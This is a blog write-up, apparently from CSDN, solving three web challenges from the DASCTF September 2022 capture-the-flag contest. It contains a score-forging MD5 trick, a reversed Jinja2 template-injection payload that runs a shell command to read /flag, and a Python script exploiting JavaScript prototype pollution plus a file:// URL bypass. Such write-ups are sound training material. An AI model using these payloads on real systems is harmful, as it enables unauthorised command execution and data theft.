DASCTF 2022九月赛WEB

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量735 收藏
点赞数
分类专栏: ctf 文章标签: python ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43952190/article/details/126995794
版权

dino3d

打开后一个游戏,提示需要玩够1000000分才能通过。
在这里插入图片描述
抓个包看一下,修改score,看到还有一个checkCode,和tm时间戳,想要绕过主要伪造checkCode。
在这里插入图片描述
看下网站源码,每个js文件查找下checkCode计算。其中一个找到关键代码。
在这里插入图片描述
得到如下信息:

var checkCode = "DASxCBCTF" + salt;
var salt="_wElc03e"
game.sn(score.score,checkCode)
sn(e,t){
……
body: "score=" + parseInt(e).toString() + "&checkCode=" + md5(parseInt(e).toString() + t) + "&tm=" + (+new Date).toString().substring(0, 10)
……
}

所以checkCode是MD5(“1000000DASxCBCTF_wElc03e”),时间戳需要设置稍大值,不断发包去匹配对应时间。
在这里插入图片描述

Text Reverser

在这里插入图片描述
功能是把字符串倒序输出,但是过滤了模板注入的{{}}符号,使用{%%}绕过,构造{%if 1%}1{%endif%}发现依旧倒序输出。
转换思路,将倒序的结果}%fidne%{1}%1 fi%{输入,得到1:
在这里插入图片描述
尝试模板注入的链,过滤了class,自己倒序链输入;过滤cat,用nl

{% print([].__class__.__base__.__subclasses__()[213].__init__.__globals__['__builtins__']['__import__']('os').popen('nl /flag').read()) %}

倒序:

str="{% print([].__class__.__base__.__subclasses__()[213].__init__.__globals__['__builtins__']['__import__']('os').popen('nl /flag').read()) %}"
n=len(str)
for i in range(0,n):
    print(str[n-i-1],end="")

在这里插入图片描述

cbshop

这道题最后有10人解出,我卡在最后绕过json检测flag字符串的地方。
首先给了源码,点开后主要是两个js

const adminUser = {
    username: "admin",
    password: "😀admin😀",
    money: 9999
};
 if(username === adminUser.username && password === adminUser.password.substring(1,6))

所以当admin密码是\u00DE00admi时,以admin用户登陆,拥有money=9999
在这里插入图片描述
在这里插入图片描述
然后主要就是购买第二个flag,源码如下:

var user = {
        username: req.session.username,
        money: req.session.money
    };
var order = buyApi(user, req.body);
//使用req.body复制给order[user.username]
Object.assign(order[user.username], product);
//function buyApi(user, product) 
else if(product.id === 2) {        //buy flag
        if(user.money >= 11 && user.token) {  //do u have token?
            if(JSON.stringify(product).includes("flag")) {
                Object.assign(order,{ msg: "hint: go to 'readFileSync'!!!!" });
            }else{
                user.money -= 11;
                Object.assign(order,{ msg: fs.readFileSync(product.name).toString() });
            }
        }else {
            Object.assign(order,{ msg: "nononono!" });
        }
    }else {
        Object.assign(order,{ code: 0, msg: "no such product!" });
    }
    Object.assign(order, { username: user.username, code: 3, money: user.money });
    return order;
}

可以看到,其中需要user.money>=11(已经满足),user.token为真,才能进入下一步。这里需要能够影响已经设定的user对象内容,用到了JS原型链污染的技术,每个对象都包含一个__proto__属性指向它的构造函数的原型对象。而核心代码Object.assign(order[user.username], product);其中username可控,通过更改用户名改为__proto__,这样的话就会将 product 对象合并到 order 的 proto 中,而user 和 order 的原型都是 Object ,是同一个原型,当 product 中构造 token:true 时,user.token 访问为 true。
在这里插入图片描述
最后是绕json格式的name不能包含"flag"字符串。其中主要查阅fs.readFileSync()函数为同步读取,其参数可以为路径,URL或者缓存区。当时主要各种编码无法实现,因为字符串原因,URL编码也不解析。之后得知使用file协议,相当于使用URL时候可以解析URL编码进行绕过。

将Content-type改为multipart/form-data或者删除,可以直接使用flag读取了?
似乎是使用form-data传输,数据被当做文件流,不经过JSON.stringify,所以绕过,但是此时被当做formData格式,依然可以解析其中key和value的值。

在这里插入图片描述

或者使用如下代码发送URL对象:

import requests
session = requests.Session()

url = "http://c303458d-c831-4b08-aa86-3654f2e37c70.node4.buuoj.cn:81/" # 题目url

def login():
    data = {
        "username": "admin",
        "password": "\uDE00admi"
    }
    session.post(url + "login", json = data)

def changeUsername():
    data = { "username": "__proto__" }
    session.post(url + "changeUsername", json = data)

def buyFlag():
    data = {
        "name":{
          "href": 'file:///fl%61g',
          "origin": 'null',
          "protocol": 'file:',
          "username": '',
          "password": '',
          "host": '',
          "hostname": '',
          "port": '',
          "pathname": '/fl%61g',
          "search": '',
          "searchParams": "URLSearchParams {}",
          "hash": ''
        },
        "id":2,
        "token":True
    }
    res = session.post(url + "buy", json = data)
    return res.text

if __name__ == '__main__':
    login()
    changeUsername()
    flag = buyFlag()
    print(flag)
marsxu626
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
2022DASCTF Apr X FATE CTF部分wp
3tefanie丶zhou的博客
04-25 2823
【只是两个人相处,那么喜欢一个人,可能会觉得她哪里都好,但是以后在一起了,就要学会喜欢她的不好】
DASCTF二进制专项 2023六月 DASKERNEL
qq_73149934的博客
03-15 305
ezkernel!have fun!
安恒_务实的网络安全.pdf
08-15
安恒_务实的网络安全 业务安全
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比专用,可以自定义内容,批量提交等,确保速度
2022DASCTF7月赋能(复现)
m0_62422842的博客
07-28 2393
DASCTF七月赋能的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF部分复现
qq_63928796的博客
08-08 2164
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 4883
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF2022 ——十月 Web 部分Writeup
渗透测试研究中心
10-28 1404
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
DASCTF 2023 & 0X401七月暑期挑战-Crypto复现
Emmaaaaa's blog
07-24 782
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
2004225e9ff0cd86ee4.pcapng
10-09
blueshrak,2020 DASCTF四月春季战备份数据包
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 305
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
DASCTF 2023 & 0X401七月暑期挑战 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1146
DASCTF 2023 & 0X401七月暑期挑战 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 693
简单题
2021-DASCTF-三月-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
安恒月 DASCTF 7月
pone2233的博客
07-25 1151
文章目录比介绍比感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比结束了 比介绍 安恒月 DASCTF 7月感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
DASCTF九月挑战复现-web
your_friends的博客
10-18 747
那么他就会直接将product合并到order原型链上那么他就可以直接添加token进入下面的判断语句了。可以发现在调用buyapi接口的时候直接将body作为实参传过去了,所以我们就可以控制product。那么我们只需要修改其中的分数,用它原来的方法对他进行一次发包就可以拿到flag。下面的代码可以看到只有当他的密码是截取的1到6位的时候才会获得9999块钱。e就是分数,t就是我们的checkcode我们直接在页面中对他进行调用。这里是可以直接传入URL的,URL会进行编码。
[MRCTF2020]Ezpop—序列化pop链
weixin_43952190的博客
05-09 6564
Ezpop 序列化Pop链 利用几个类之间相互关联进行构造 文件包含漏洞 Modifier类中append函数使用了include(),会出现文件包含漏洞。 以下是题目内容: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%
2022dasctf x su 三月春季挑战
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战将会是一场精彩的比。我们将会为参者提供丰富多彩的挑战,让大家可以在比中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战和乐趣的比

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值